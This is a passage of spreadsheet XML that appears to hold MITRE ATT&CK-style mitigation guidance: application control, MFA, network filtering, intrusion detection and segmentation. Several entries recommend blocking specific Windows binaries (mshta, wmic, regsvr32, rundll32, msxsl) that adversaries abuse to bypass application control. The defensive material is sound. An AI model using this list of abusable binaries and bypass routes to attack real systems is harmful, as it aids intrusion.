    <t>Use application control configured to block execution of &lt;code&gt;mshta.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;mshta.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software executed that may be executed through this technique by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>Use application control configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )</t>
  </si>
  <si>
    <t>Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Denylist Python where not required.</t>
  </si>
  <si>
    <t>Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use application control to mitigate installation and use of unapproved software that can be used for remote access.</t>
  </si>
  <si>
    <t>Use application control to mitigate installation and use of unapproved virtualization software.</t>
  </si>
  <si>
    <t>Enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.</t>
  </si>
  <si>
    <t>Block .scr files from being executed from non-standard locations.</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software executed through this technique by using application control tools capable of preventing unknown DLLs from being loaded.</t>
  </si>
  <si>
    <t>System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious content.</t>
  </si>
  <si>
    <t>Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using application control (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Certain developer utilities should be blocked or restricted if not required.</t>
  </si>
  <si>
    <t>Use application control configured to block execution of verclsid.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use application control where appropriate. VBA macros obtained from the Internet, based on the file's Mark of the Web (MOTW) attribute, may be blocked from executing in Office applications (ex: Access, Excel, PowerPoint, Visio, and Word) by default starting in Windows Version 2203.(Citation: Default VBS macros Blocking )</t>
  </si>
  <si>
    <t>Use application control configured to block execution of &lt;code&gt;wmic.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;wmic.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed through the Winlogon helper process by using application control (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.</t>
  </si>
  <si>
    <t>Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.</t>
  </si>
  <si>
    <t>Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.(Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.(Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.</t>
  </si>
  <si>
    <t>Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.</t>
  </si>
  <si>
    <t>Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.</t>
  </si>
  <si>
    <t>Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass application control. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.</t>
  </si>
  <si>
    <t>Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).</t>
  </si>
  <si>
    <t>Consider enabling DHCP Snooping and Dynamic ARP Inspection on switches to create mappings between IP addresses requested via DHCP and ARP tables and tie the values to a port on the switch that may block bogus traffic.(Citation: Cisco ARP Poisoning Mitigation 2016)(Citation: Juniper DAI 2020)</t>
  </si>
  <si>
    <t>Use network appliances and host-based security software to block network traffic that is not necessary within the environment, such as legacy protocols that may be leveraged for AiTM conditions.</t>
  </si>
  <si>
    <t>Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.</t>
  </si>
  <si>
    <t>Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.</t>
  </si>
  <si>
    <t>Limit access to the Instance Metadata API using a host-based firewall such as iptables. A properly configured Web Application Firewall (WAF) may help prevent external adversaries from exploiting Server-side Request Forgery (SSRF) attacks that allow access to the Cloud Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)</t>
  </si>
  <si>
    <t>Consider filtering DHCP traffic on ports 67 and 68 to/from unknown or untrusted DHCP servers. Additionally, port security may also be enabled on layer switches. Furthermore, consider enabling DHCP snooping on layer 2 switches as it will prevent DHCP spoofing attacks and starvation attacks. Consider tracking available IP addresses through a script or a tool. 
Additionally, block DHCPv6 traffic and incoming router advertisements, especially if IPv6 is not commonly used in the network.(Citation: ntlm_relaying_kerberos_del)</t>
  </si>
  <si>
    <t xml:space="preserve">Consider filtering DNS requests to unknown, untrusted, or known bad domains and resources. Resolving DNS requests with on-premise/proxy servers may also disrupt adversary attempts to conceal data within DNS packets. </t>
  </si>
  <si>
    <t>Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.</t>
  </si>
  <si>
    <t>Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)
Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)
As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.</t>
  </si>
  <si>
    <t>Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.</t>
  </si>
  <si>
    <t xml:space="preserve">Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. </t>
  </si>
  <si>
    <t xml:space="preserve">
Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with allowlisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)</t>
  </si>
  <si>
    <t>Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)</t>
  </si>
  <si>
    <t>Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).</t>
  </si>
  <si>
    <t>Block Traffic	Upon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised.  Continue to monitor for additional activity and to ensure that the blocks are indeed effective.</t>
  </si>
  <si>
    <t>Upon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised.  Continue to monitor for additional activity and to ensure that the blocks are indeed effective.</t>
  </si>
  <si>
    <t>Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.</t>
  </si>
  <si>
    <t>Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.</t>
  </si>
  <si>
    <t xml:space="preserve">Consider filtering network traffic to untrusted or known bad domains and resources. </t>
  </si>
  <si>
    <t>Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.</t>
  </si>
  <si>
    <t>Implement network-based filtering restrictions to prohibit data transfers to untrusted VPCs.</t>
  </si>
  <si>
    <t>VNC defaults to TCP ports 5900 for the server, 5800 for browser access, and 5500 for a viewer in listening mode. Filtering or blocking these ports will inhibit VNC traffic utilizing default ports.</t>
  </si>
  <si>
    <t>Consider modifying host firewall rules to prevent egress traffic from verclsid.exe.</t>
  </si>
  <si>
    <t>Create static ARP entries for networked devices. Implementing static ARP entries may be infeasible for large networks.</t>
  </si>
  <si>
    <t>If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.(Citation: TechNet RDP Gateway)</t>
  </si>
  <si>
    <t>Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce AiTM conditions.</t>
  </si>
  <si>
    <t>Limit communications with the container service to local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API on port 2375. Instead, communicate with the Docker API over TLS on port 2376.(Citation: Docker Daemon Socket Protect)</t>
  </si>
  <si>
    <t>Limit communications with the container service to local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API and Kubernetes API Server.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access)</t>
  </si>
  <si>
    <t>Limit communications with the container service to local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API, Kubernetes API Server, and container orchestration web applications.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access)</t>
  </si>
  <si>
    <t>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.</t>
  </si>
  <si>
    <t>Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.</t>
  </si>
  <si>
    <t>Use remote desktop gateways.</t>
  </si>
  <si>
    <t>Consider disabling Windows administrative shares.</t>
  </si>
  <si>
    <t xml:space="preserve">Restrict use of protocols without encryption or authentication mechanisms. Limit access to administrative and management interfaces from untrusted network sources. </t>
  </si>
  <si>
    <t>Limit the use of USB devices and removable media within a network.</t>
  </si>
  <si>
    <t>Block unknown devices and accessories by endpoint security configuration and monitoring agent.</t>
  </si>
  <si>
    <t>Only install browser extensions from trusted sources that can be verified. Browser extensions for some browsers can be controlled through Group Policy. Change settings to prevent the browser from installing extensions without sufficient permissions.</t>
  </si>
  <si>
    <t>Restrict software installation to trusted repositories only and be cautious of orphaned software packages.</t>
  </si>
  <si>
    <t>Prevent users from installing Python where not required.</t>
  </si>
  <si>
    <t>Restrict software installation to user groups that require it. A VNC server must be manually installed by the user or adversary.</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts.</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Consider enforcing multi-factor authentication for the &lt;code&gt;CreateKeyPair&lt;/code&gt; and &lt;code&gt;ImportKeyPair&lt;/code&gt; API calls through IAM policies.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.</t>
  </si>
  <si>
    <t>Use multi-factor authentication for cloud accounts, especially privileged accounts. This can be implemented in a variety of forms (e.g. hardware, virtual, SMS), and can also be audited using administrative reporting features.(Citation: AWS - IAM Console Best Practices)</t>
  </si>
  <si>
    <t>Use multi-factor authentication for logons to code repositories.</t>
  </si>
  <si>
    <t>Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation: Amazon S3 Security, 2019)</t>
  </si>
  <si>
    <t>Require multi-factor authentication to register devices in Azure AD.(Citation: Microsoft - Device Registration) Configure multi-factor authentication systems to disallow enrolling new devices for inactive accounts.(Citation: CISA MFA PrintNightmare)</t>
  </si>
  <si>
    <t>Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs.</t>
  </si>
  <si>
    <t xml:space="preserve">Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. </t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>Use of multi-factor authentication for public-facing webmail servers is a recommended best practice to minimize the usefulness of usernames and passwords to adversaries.</t>
  </si>
  <si>
    <t>Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.</t>
  </si>
  <si>
    <t>Ensure that MFA and MFA policies and requirements are properly implemented for existing and deactivated or dormant accounts and devices. If possible, consider configuring MFA solutions to "fail closed" rather than grant access in case of serious errors.</t>
  </si>
  <si>
    <t>Implement more secure 2FA/MFA mechanisms in replacement of simple push or one-click 2FA/MFA options. For example, having users enter a one-time code provided by the login screen into the 2FA/MFA application or utilizing other out-of-band 2FA/MFA mechanisms (such as rotating code-based hardware tokens providing rotating codes that need an accompanying user pin) may be more secure. Furthermore, change default configurations and implement limits upon the maximum number of 2FA/MFA request prompts that can be sent to users in period of time.(Citation: MFA Fatigue Attacks - PortSwigger)</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>Use multi-factor authentication wherever possible.</t>
  </si>
  <si>
    <t>Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information.</t>
  </si>
  <si>
    <t>Use multi-factor authentication for remote logins.(Citation: Berkley Secure)</t>
  </si>
  <si>
    <t>Use multi-factor authentication on remote service logons where possible.</t>
  </si>
  <si>
    <t>Require multi-factor authentication for SSH connections wherever possible, such as password protected SSH keys.</t>
  </si>
  <si>
    <t>Ensure proper system and access isolation for critical network systems through use of multi-factor authentication.</t>
  </si>
  <si>
    <t>A physical second factor key that uses the target login domain as part of the negotiation protocol will prevent session cookie theft through proxy methods.(Citation: Evilginx 2 July 2018)</t>
  </si>
  <si>
    <t>Require MFA for all delegated administrator accounts.(Citation: Microsoft Nobelium Admin Privileges)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.(Citation: dhcp_serv_op_events)</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. </t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Malware researchers can reverse engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Malware researchers can reverse engineer malware variants that use dynamic resolution and determine future C2 infrastructure that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force)</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. </t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level. </t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network prevention intrusion systems and systems designed to scan and remove malicious downloads can be used to block activity.</t>
  </si>
  <si>
    <t>If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.</t>
  </si>
  <si>
    <t>onfigure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources. Create signatures to detect Smart Install (SMI) usage from sources other than trusted director.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)</t>
  </si>
  <si>
    <t>Use network intrusion detection/prevention systems to detect and prevent remote service scans.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.</t>
  </si>
  <si>
    <t>Network intrusion prevention systems and systems designed to scan and remove malicious email attachments or links can be used to block activity.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations.  </t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to remote access services.</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific technique used by a particular adversary or tool, and will likely be different across various network configurations. </t>
  </si>
  <si>
    <t>Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.</t>
  </si>
  <si>
    <t>Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of AiTM activity.</t>
  </si>
  <si>
    <t>Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.</t>
  </si>
  <si>
    <t>Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.</t>
  </si>
  <si>
    <t>Identify critical business and system processes that may be targeted by adversaries and work to isolate and secure those systems against unauthorized access and tampering.</t>
  </si>
  <si>
    <t>Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>Enable Windows firewall, which prevents DCOM instantiation by default.</t>
  </si>
  <si>
    <t>Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts).</t>
  </si>
  <si>
    <t>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.</t>
  </si>
  <si>
    <t>Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods.</t>
  </si>
  <si>
    <t xml:space="preserve">Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017) </t>
  </si>
  <si>
    <t>Ensure proper network segmentation is followed to protect critical servers and devices.</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment.</t>
  </si>
  <si>
    <t>Enable firewall rules to block RDP traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>Enable firewall rules to block unnecessary traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.</t>
  </si>
  <si>
    <t>Ensure proper system isolation for critical network systems through use of firewalls.</t>
  </si>
  <si>
    <t>Network segmentation can be used to isolate infrastructure components that do not require broad network access.</t>
  </si>
  <si>
    <t>If the service is necessary, lock down critical enclaves with separate WinRM infrastructure and follow WinRM best practices on use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system. Ensuring that the sudo tty_tickets setting is enabled will prevent this leakage across tty sessions.</t>
  </si>
  <si>
    <t>To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later.(Citation: TechNet RDP NLA)</t>
  </si>
  <si>
    <t>Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)</t>
  </si>
  <si>
    <t>Protect domain controllers by ensuring proper security configuration for critical servers to limit access by potentially unnecessary protocols and services, such as SMB file sharing.</t>
  </si>
  <si>
